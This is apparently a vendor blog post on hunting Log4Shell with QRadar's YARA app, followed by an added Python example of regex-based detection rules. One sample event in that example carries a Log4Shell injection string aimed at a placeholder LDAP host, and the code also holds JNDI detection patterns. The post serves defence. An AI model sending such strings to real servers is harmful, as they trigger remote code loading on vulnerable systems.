Hi guys
I bet all the alarms are on and you are under water right now, so I'll keep it short! I hope you have already been notified of Adam's blog on the detection of Log4Shell (CVE-2021-44228) using QRadar. Please go back to it from time to time, as he will update the blog as new information comes in.
In the meantime I also wanted to tell you about the release of the YARA app. We hope it will help you extend your investigation capabilities so you can respond more quickly.
I said I would keep it short, so here is how to proceed with it:
1 - Download the app from the App Exchange
You can find the app on the App Exchange here: IBM Security QRadar Manager for YARA Rule
Notes:
- Internet access is required only for GitHub synchronization
- The app is compatible with 7.3.3 Patch 6+ and 7.4.1 Patch 2+ (7.4.0 is not supported)
2 - Configure the app with a token
3 - Go to the YARA tab and create a new rule.
If you are looking for help with Log4j detection, you can use the rule published by Florian Roth on GitHub and download its content directly into the app using the following link:
https://github.com/Neo23x0/signature-base/blob/master/yara/expl_log4j_cve_2021_44228.yar
Or simply import your own rules.
4 - Scan the data
Get the properties
In his blog, Adam proposed working on the following properties: URL, URL Query String, UrlHost, User Agent, Referrer URL, Request Site, Request URI, API Path.
We have made these properties available on the App Exchange for a few web application firewalls and web servers:
AWS WAF and Kubernetes: IBM QRadar Content Extension for Amazon AWS
Microsoft IIS: IBM Security QRadar Custom Properties for Microsoft IIS
NGINX: IBM Security QRadar Custom Properties for NGINX
Apache: IBM Security QRadar Custom Properties for Apache
Choose the data
Many options are available to you here.
The first set of options concerns the data you want to scan; you can choose between four possibilities.
For today's investigation you will probably be interested in options 1, 2 and 3:
- Payload: This option lets you paste raw payloads, for example those coming from an offense investigation or from a third party.
- Advanced Search (AQL) and Saved Search: These are the searches coming from the Log Activity and Network Activity tabs. They are a quick way to retrieve all the data for a particular device or user over a specific period of time, for example.
- Upload File: This option lets you upload an actual suspicious file and scan it with the YARA rules you've defined.
The second half of the screen lets you choose which rules will be used to scan your data.
The app triggers a scan on the sample of data you selected in the first part and returns a match / no match result, depending on the options you selected here. You can decide that a payload must be matched by any rule in your namespace, by all the rules, or only by a selection of them.
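To make the scan and the "any rule / all rules / selection" matching options concrete, here is an added Python example that is not part of the post and not the app's own code. It concatenates the properties Adam listed (URL, User Agent, Referrer URL and so on) for each event and evaluates a small, deliberately simplified stand-in for YARA rules against them. The rule names, the indicator patterns, the sample events and the `scan_events` helper are all constructed for illustration; for a real investigation use the signature-base rule linked above and the app's scan screen.

```python
import re
from dataclasses import dataclass

# Properties suggested in Adam's blog for the scan. These are the names used
# in the post, not QRadar's internal property identifiers (assumption).
SCAN_PROPERTIES = ["URL", "URL Query String", "UrlHost", "User Agent",
                   "Referrer URL", "Request Site", "Request URI", "API Path"]


@dataclass
class Rule:
    """Minimal, hypothetical stand-in for a YARA rule: named regex strings
    plus an 'any of them' / 'all of them' condition."""
    name: str
    strings: dict            # identifier -> regex pattern
    condition: str = "any"   # "any" or "all"

    def match(self, data: str) -> list:
        """Return the identifiers of the strings that hit, or [] if the
        rule's condition is not satisfied."""
        hits = [ident for ident, pat in self.strings.items()
                if re.search(pat, data, re.IGNORECASE)]
        if self.condition == "all":
            return hits if len(hits) == len(self.strings) else []
        return hits


# Constructed, intentionally simplified indicators. The published rule from
# signature-base is far more complete; these only illustrate the mechanics.
RULES = [
    Rule("constructed_jndi_lookup", {"$jndi": r"\$\{jndi:"}),
    Rule("constructed_obfuscated_lookup",
         {"$lower": r"\$\{lower:", "$upper": r"\$\{upper:", "$env": r"\$\{env:"}),
]


def scan_event(event: dict, rules, mode="any", selection=()):
    """Evaluate rules against one event's scan properties.

    mode: "any"       -> matched if at least one rule fires
          "all"       -> matched only if every rule fires
          "selection" -> only the rules named in `selection` are evaluated,
                         and any one of them firing counts as a match
    """
    data = "\n".join(str(event.get(p, "")) for p in SCAN_PROPERTIES)
    active = [r for r in rules if mode != "selection" or r.name in selection]
    fired = {}
    for rule in active:
        hits = rule.match(data)
        if hits:
            fired[rule.name] = hits
    if mode == "all":
        matched = bool(active) and len(fired) == len(active)
    else:
        matched = bool(fired)
    return {"matched": matched, "rules": fired}


# Constructed sample events; placeholder.invalid is a reserved test domain.
EVENTS = [
    {"id": 1, "URL": "/login", "User Agent": "Mozilla/5.0",
     "Referrer URL": "https://example.test/"},
    {"id": 2, "URL": "/login",
     "User Agent": "${jndi:ldap://placeholder.invalid/a}"},
    {"id": 3, "URL": "/search", "URL Query String": "q=${lower:x}"},
]


def scan_events(events, rules=RULES, mode="any", selection=()):
    """Scan a batch of events and return {event id: result}."""
    return {e["id"]: scan_event(e, rules, mode, selection) for e in events}


if __name__ == "__main__":
    for event_id, result in scan_events(EVENTS).items():
        print(event_id, result)
```

With the default `mode="any"`, event 2 is reported through the JNDI rule and event 3 through the obfuscation rule, while event 1 stays clean; switching to `mode="all"` clears both, because neither event satisfies every rule, and `mode="selection"` restricts the evaluation to the rules you name, exactly as the second half of the scan screen lets you do.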
If you are interested in reading more about QRadar Security Content, you can find the complete list of blog entries here.